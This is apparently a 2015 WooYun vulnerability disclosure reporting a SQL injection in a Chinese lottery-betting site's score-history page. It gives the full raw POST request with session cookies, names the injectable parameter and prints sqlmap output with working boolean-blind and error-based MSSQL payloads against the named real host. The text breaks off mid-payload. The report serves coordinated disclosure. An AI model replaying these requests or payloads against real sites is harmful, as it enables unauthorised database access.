投注网某站一处隐秘SQL注入漏洞 | wooyun-2015-0145868| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145868

漏洞标题：投注网某站一处隐秘SQL注入漏洞

漏洞作者：路人甲

提交时间：2015-10-12 00:02

修复时间：2015-11-30 14:24

公开时间：2015-11-30 14:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-12：细节已通知厂商并且等待厂商处理中
2015-10-16：厂商已经确认，细节仅向厂商公开
2015-10-26：细节向核心白帽子及相关领域专家公开
2015-11-05：细节向普通白帽子公开
2015-11-15：细节向实习白帽子公开
2015-11-30：细节向公众公开

简要描述：

详细说明：

http://kf.touzhu.cn/Web/ScoreHis.aspx

POST /Web/ScoreHis.aspx HTTP/1.1
Host: kf.touzhu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://kf.touzhu.cn/Web/ScoreHis.aspx
Content-Length: 6268
Cookie: Hm_lvt_1960c483f4fc5ef584a135a1bf5419bf=1444467999,1444474228; ASP.NET_SessionId=fshjxrumpqmtxlbhn2l2bpai; Hm_lpvt_1960c483f4fc5ef584a135a1bf5419bf=1444474248
Connection: keep-alive
Pragma: no-cache
ScriptManager1=UpdatePanel1%7Cbtn_Sub&TouZhuHead1%24txt_username=&TouZhuHead1%24txt_pass=&TouZhuHead1%24searchText=%E5%85%A8%E7%AB%99%E6%90%9C%E7%B4%A2&hisdata=rdo_his6&sclassList%24ctl00%24sclass=on&sclassList%24ctl00%24sclassId=175&__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMjU2OTYyNDEyDxYIHghkZWxldGVpZGUeBlNjbGFzc2UeBHR5cGVlHghvbGRTY29yZWUWAgIBD2QWCgIDD2QWBAIGDxYCHgdWaXNpYmxlaGQCBw8PFgIfBGdkZAIFD2QWAmYPZBYOAgEPEA8WBB4EVGV4dAUUMTDmnIg55pelICDmmJ%2FmnJ%2FkupQeB0NoZWNrZWRoZGRkZAIDDxAPFgQfBQUUMTDmnIg45pelICDmmJ%2FmnJ%2Flm5sfBmhkZGRkAgUPEA8WBB8FBRQxMOaciDfml6UgIOaYn%2Bacn%2BS4iR8GaGRkZGQCBw8QDxYEHwUFFDEw5pyINuaXpSAg5pif5pyf5LqMHwZoZGRkZAIJDxAPFgQfBQUUMTDmnIg15pelICDmmJ%2FmnJ%2FkuIAfBmhkZGRkAgsPEA8WBB8FBRQxMOaciDTml6UgIOaYn%2Bacn%2BaXpR8GZ2RkZGQCDQ8QDxYEHwUFFDEw5pyIM%2BaXpSAg5pif5pyf5YWtHwZoZGRkZAIHD2QWAmYPZBYCAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgRmDxUBByM2NjY2NjZkAgIPFQIJ5biM6IWK55SyATFkAgkPZBYCZg9kFgICAQ8WAh8IAgEWAmYPZBYEAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFBjcyOTAxNWRkAgIPFSMHIzY2NjY2NgnluIzohYrnlLILMTAtMDQgMDY6MDAD5a6MBFsxNV0M5pyt6YeR57Si5pavATEBMBJBU0vlpafmnpfmr5Tnp5Hmlq8EWzE0XQEwATABLQIxNQzmnK3ph5HntKLmlq8SQVNL5aWn5p6X5q%2BU56eR5pavAjE0AAAAAAAAAAAAAAAAAAAAAAAAZAILD2QWEAIBDxYCHwgCDBYYZg9kFgJmDxUCAjQ2NuaIkeaYr%2BaXp%2BeJiOeahOiAgeeUqOaIt%2B%2B8jOi%2FmOmcgOimgemHjeaWsOazqOWGjOWQl%2B%2B8n2QCAQ9kFgJmDxUCAjYyJ%2BWFs%2BazqOS4juiuoumYhemDveS8muaJo%2BmZpOmHkeixhuWQl%2B%2B8n2QCAg9kFgJmDxUCAjYzHuaIkeW%2FmOiusOS6huWvhueggeaAjuS5iOWKnu%2B8n2QCAw9kFgJmDxUCAjY0HuaIkeW%2FmOiusOi0puaIt%2BWQjeaAjuS5iOWKnu%2B8n2QCBA9kFgJmDxUCAjY1JOWmguS9lei0reS5sOaipuS5i%2BmYn%2BS4k%2BWutuaOqOiNkO%2B8n2QCBQ9kFgJmDxUCAjUxG%2BWmguS9leS%2FruaUueS4quS6uuS%2FoeaBr%2B%2B8n2QCBg9kFgJmDxUCAjUyMOecn%2BWunuWnk%2BWQjeWSjOi6q%2BS7veivgeS%2FoeaBr%2BaYr%2BWQpuS8muazhOmcsu%2B8n2QCBw9kFgJmDxUCAjUzFeiDveWQpumAgOiuouS6p%2BWTge%2B8n2QCCA9kFgJmDxUCAjU0G%2BWFheWAvOacieWTquWHoOenjeaWueW8j%2B%2B8n2QCCQ9kFgJmDxUCAjU1G%2BWmguS9lei%2Fm%2BihjOWcqOe6v%2BWFheWAvO%2B8n2QCCg9kFgJmDxUCAjU2G%2BWFheWAvOmcgOimgeaJi%2Be7rei0ueWQl%2B%2B8n2QCCw9kFgJmDxUCAjg1J%2BS4k%2BWutuaIkOe7qeaYr%2BS4jeaYr%2BmDveaYr%2Becn%2BWunueahO%2B8n2QCAw8WAh8IAgcWDmYPZBYEZg8VAxVodHRwOi8vd3d3LnRvdXpodS5jbi8J5oqV5rOo572RCeaKleazqOe9kWQCAQ8PFgIeCEltYWdlVXJsBSd%2BL1VwTG9hZHMvYXV0aG9ySW1nLzIwMTQ5OTE1MzYzNjYyOS5wbmdkZAIBD2QWBGYPFQMcaHR0cDovL3Nwb3J0cy5xcS5jb20vbG90dGVyeQzohb7orq%2FlvannpagM6IW%2B6K6v5b2p56WoZAIBDw8WAh8KBSh%2BL1VwTG9hZHMvYXV0aG9ySW1nLzIwMTQ0MjExNzE0MzE2NTcuZ2lmZGQCAg9kFgRmDxUDFGh0dHA6Ly93d3cuY3BkeWouY29tD%2BW9qeelqOWkp%2Bi1ouWutg%2FlvannpajlpKfotaLlrrZkAgEPDxYCHwoFKH4vVXBMb2Fkcy9hdXRob3JJbWcvMjAxMTEwODE3MzU0Mjc2OC5naWZkZAIDD2QWBGYPFQMWaHR0cDovL3d3dy50aXRhbjI0LmNvbQnkvZPlnZvnvZEJ5L2T5Z2b572RZAIBDw8WAh8KBSh%2BL1VwTG9hZHMvYXV0aG9ySW1nLzIwMTExMDgxNzM1NTU4NTEuZ2lmZGQCBA9kFgRmDxUDG2h0dHA6Ly9sb3R0ZXJ5LnNpbmEuY29tLmNuLwzmlrDmtarlvannpagM5paw5rWq5b2p56WoZAIBDw8WAh8KBSd%2BL1VwTG9hZHMvYXV0aG9ySW1nLzIwMTExMDgxNzM2MTQ3Ny5naWZkZAIFD2QWBGYPFQMWaHR0cDovL2NhaXBpYW8uMTYzLmNvbQznvZHmmJPlvannpagM572R5piT5b2p56WoZAIBDw8WAh8KBSh%2BL1VwTG9hZHMvYXV0aG9ySW1nLzIwMTExMDgxNzM2MTE3NDYuZ2lmZGQCBg9kFgRmDxUDE2h0dHA6Ly93d3cueWljcC5jb20J5LiA5b2p56WoCeS4gOW9qeelqGQCAQ8PFgIfCgUofi9VcExvYWRzL2F1dGhvckltZy8yMDE0NDIxMTcxODM4MTE5LnBuZ2RkAgUPFgIfCAIDFgZmD2QWAmYPFQQXaHR0cDovL3d3dy5kaXlpY2FpLmNvbS8P56aP5b2p5Y%2BM6Imy55CDBmZvbGxvdw%2Fnpo%2Flvanlj4zoibLnkINkAgEPZBYCZg8VBBZodHRwOi8vd3d3LmljYWlsZS5jb20vCeeIseW9qeS5kAZmb2xsb3cJ54ix5b2p5LmQZAICD2QWAmYPFQQYaHR0cDovLzIwMTQuc2luYS5jb20uY24vCeS4lueVjOadrwZmb2xsb3cJ5LiW55WM5p2vZAIHDxYCHwgCAhYEZg9kFgJmDxUEGGh0dHA6Ly93d3cuc29iZXQuY29tLmNuLwnmkJzljZrnvZEGZm9sbG93CeaQnOWNmue9kWQCAQ9kFgJmDxUEFmh0dHA6Ly93d3cuMTY2ODg4Lm5ldC8S5b2p56Wo572R5Z2A5aSn5YWoBmZvbGxvdxLlvannpajnvZHlnYDlpKflhahkAgkPFgIfCAIMFhhmD2QWAmYPFQQVaHR0cDovL3d3dy50b3V6aHUuY24vCeaKleazqOe9kQZmb2xsb3cJ5oqV5rOo572RZAIBD2QWAmYPFQQUaHR0cDovL3d3dy5jbTE2OC5jbi8M5b2p5rCR5ZWG5Z%2BOBmZvbGxvdwzlvanmsJHllYbln45kAgIPZBYCZg8VBBtodHRwOi8vd3d3LmNhaXBpYW9rb25nLmNvbS8J5b2p56Wo5o6nBmZvbGxvdwnlvannpajmjqdkAgMPZBYCZg8VBBpodHRwOi8vd3d3LnRvdXpodXpoYW4uY29tLwnlj4zlvannvZEGZm9sbG93CeWPjOW9qee9kWQCBA9kFgJmDxUEGSBodHRwOi8vd3d3LnN0YXJsb3R0LmNvbS8J5pif5b2p572RBmZvbGxvdwnmmJ%2FlvannvZFkAgUPZBYCZg8VBBtodHRwOi8vd3d3LmppYW5nZHVvZHVvLmNvbS8J5aWW5aSa5aSaBmZvbGxvdwnlpZblpJrlpJpkAgYPZBYCZg8VBBVodHRwOi8va2ouZWNwODg4LmNvbS8P5b2p56Wo55u06YCa6L2mBmZvbGxvdw%2Flvannpajnm7TpgJrovaZkAgcPZBYCZg8VBBZodHRwOi8vd3d3LjE2OGNhaS5jb20vDDE2OOW9qeelqOe9kQZmb2xsb3cMMTY45b2p56Wo572RZAIID2QWAmYPFQQVaHR0cDovL3d3dy5jcGJsbS5jb20gD%2BW9qeelqOeZvuS5kOmXqAZmb2xsb3cP5b2p56Wo55m%2B5LmQ6ZeoZAIJD2QWAmYPFQQVaHR0cDovL3d3dy56czMxMC5jb20vDOaZuuiDnOW9qeelqAZmb2xsb3cM5pm66IOc5b2p56WoZAIKD2QWAmYPFQQWaHR0cDovL3d3dy5odWFjYWkuY29tLwzljY7lvanlvannpagGZm9sbG93DOWNjuW9qeW9qeelqGQCCw9kFgJmDxUEGmh0dHA6Ly93d3cuY2FpbGl6aG9uZy5jb20vCeW9qeeri%2BS4rQZmb2xsb3cJ5b2p56uL5LitZAILDxYCHwhmZAINDxYCHwhmZAIPDxYCHwgCCRYSZg9kFgJmDxUEFmh0dHA6Ly9iYnMuYWlibzEyMy5jb20P54ix5rOi572R6K665Z2bBmZvbGxvdw%2FniLHms6LnvZHorrrlnZtkAgEPZBYCZg8VBBdodHRwOi8vd3d3LmJhbGxwdXJlLmNvbQnniIbmo5rnvZEGZm9sbG93CeeIhuajmue9kWQCAg9kFgJmDxUEFmh0dHA6Ly93d3cuODF0aXl1LmNvbS8P5YWr5LiA5L2T6IKy572RBmZvbGxvdw%2FlhavkuIDkvZPogrLnvZFkAgMPZBYCZg8VBBZodHRwOi8vd3d3LjUzbmJhLmNvbS8gEWNjdHY15Zyo57q%2F55u05pKtBmZvbGxvdxFjY3R2NeWcqOe6v%2BebtOaSrWQCBA9kFgJmDxUEFmh0dHA6Ly93d3cuZnh0aXl1LmNvbS8M6aOe57%2BU5L2T6IKyBmZvbGxvdwzpo57nv5TkvZPogrJkAgUPZBYCZg8VBBdodHRwOi8vd3d3LjkwdGl5dS5jb20vIAs5MOS9k%2BiCsue9kQZmb2xsb3cLOTDkvZPogrLnvZFkAgYPZBYCZg8VBBZodHRwOi8vd3d3LnFpdXBhbi5jb20vDOeQg%2BebmOS9k%2BiCsgZmb2xsb3cM55CD55uY5L2T6IKyZAIHD2QWAmYPFQQaaHR0cDovL3d3dy51c3BvcnRuZXdzLmNvbS8HVeS9k%2BiCsgZmb2xsb3cHVeS9k%2BiCsmQCCA9kFgJmDxUEGmh0dHA6Ly9saXZlMS5ub3dzY29yZS5jb20vDOi2s%2BeQg%2BavlOWIhgZmb2xsb3cM6Laz55CD5q%2BU5YiGZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDgUIcmRvX2hpczEFCHJkb19oaXMxBQhyZG9faGlzMgUIcmRvX2hpczIFCHJkb19oaXMzBQhyZG9faGlzMwUIcmRvX2hpczQFCHJkb19oaXM0BQhyZG9faGlzNQUIcmRvX2hpczUFCHJkb19oaXM2BQhyZG9faGlzNwUIcmRvX2hpczcFF3NjbGFzc0xpc3QkY3RsMDAkc2NsYXNzH0C%2BuuI1ctYgoKApZRVglx8KNzZDuBZz4mxL%2Fdq%2B024%3D&__EVENTVALIDATION=%2FwEWEwLhjrwBAt%2F45YAPAt%2F4%2Bf0EAt%2F4jdoNAt%2F4obcFAt%2F4tewCAt%2F4ycgLAt%2F43aUDAtbwh%2BMLAqz7ldQJApn7utMLArPZld0FAqrRkYQDAo3Ku%2BAOAoeO39sLAojXkbYFAuK8g%2FYMAuuvoKwEAripj7YKaOdd5UYxAAnl%2BlohJXzURiN0X23v5AOfljAZMujatfs%3D&__ASYNCPOST=true&btn_Sub=%E7%A1%AE%E5%AE%9A

注入点：sclassList%24ctl00%24sclassId
报错和布尔类型的：

漏洞证明：

sqlmap identified the following injection point(s) with a total of 27 HTTP(s) requests:
---
Parameter: sclassList$ctl00$sclassId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ScriptManager1=UpdatePanel1|btn_Sub&TouZhuHead1$txt_username=&TouZhuHead1$txt_pass=&TouZhuHead1$searchText=%E5%85%A8%E7%AB%99%E6%90%9C%E7%B4%A2&hisdata=rdo_his6&sclassList$ctl00$sclass=on&sclassList$ctl00$sclassId=175) AND 3103=3103 AND (2009=2009&__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=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BmZvbGxvdwzpo57nv5TkvZPogrJkAgUPZBYCZg8VBBdodHRwOi8vd3d3LjkwdGl5dS5jb20vIAs5MOS9k+iCsue9kQZmb2xsb3cLOTDkvZPogrLnvZFkAgYPZBYCZg8VBBZodHRwOi8vd3d3LnFpdXBhbi5jb20vDOeQg+ebmOS9k+iCsgZmb2xsb3cM55CD55uY5L2T6IKyZAIHD2QWAmYPFQQaaHR0cDovL3d3dy51c3BvcnRuZXdzLmNvbS8HVeS9k+iCsgZmb2xsb3cHVeS9k+iCsmQCCA9kFgJmDxUEGmh0dHA6Ly9saXZlMS5ub3dzY29yZS5jb20vDOi2s+eQg+avlOWIhgZmb2xsb3cM6Laz55CD5q+U5YiGZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDgUIcmRvX2hpczEFCHJkb19oaXMxBQhyZG9faGlzMgUIcmRvX2hpczIFCHJkb19oaXMzBQhyZG9faGlzMwUIcmRvX2hpczQFCHJkb19oaXM0BQhyZG9faGlzNQUIcmRvX2hpczUFCHJkb19oaXM2BQhyZG9faGlzNwUIcmRvX2hpczcFF3NjbGFzc0xpc3QkY3RsMDAkc2NsYXNzH0C+uuI1ctYgoKApZRVglx8KNzZDuBZz4mxL/dq+024=&__EVENTVALIDATION=/wEWEwLhjrwBAt/45YAPAt/4+f0EAt/4jdoNAt/4obcFAt/4tewCAt/4ycgLAt/43aUDAtbwh+MLAqz7ldQJApn7utMLArPZld0FAqrRkYQDAo3Ku+AOAoeO39sLAojXkbYFAuK8g/YMAuuvoKwEAripj7YKaOdd5UYxAAnl+lohJXzURiN0X23v5AOfljAZMujatfs=&__ASYNCPOST=true&btn_Sub=%E7%A1%AE%E5%AE%9A
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ScriptManager1=UpdatePanel1|btn_Sub&TouZhuHead1$txt_username=&TouZhuHead1$txt_pass=&TouZhuHead1$searchText=%E5%85%A8%E7%AB%99%E6%90%9C%E7%B4%A2&hisdata=rdo_his6&sclassList$ctl00$sclass=on&sclassList$ctl00$sclassId=175) AND 6067=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6067=6067) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113))) AND (7225=7225&__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=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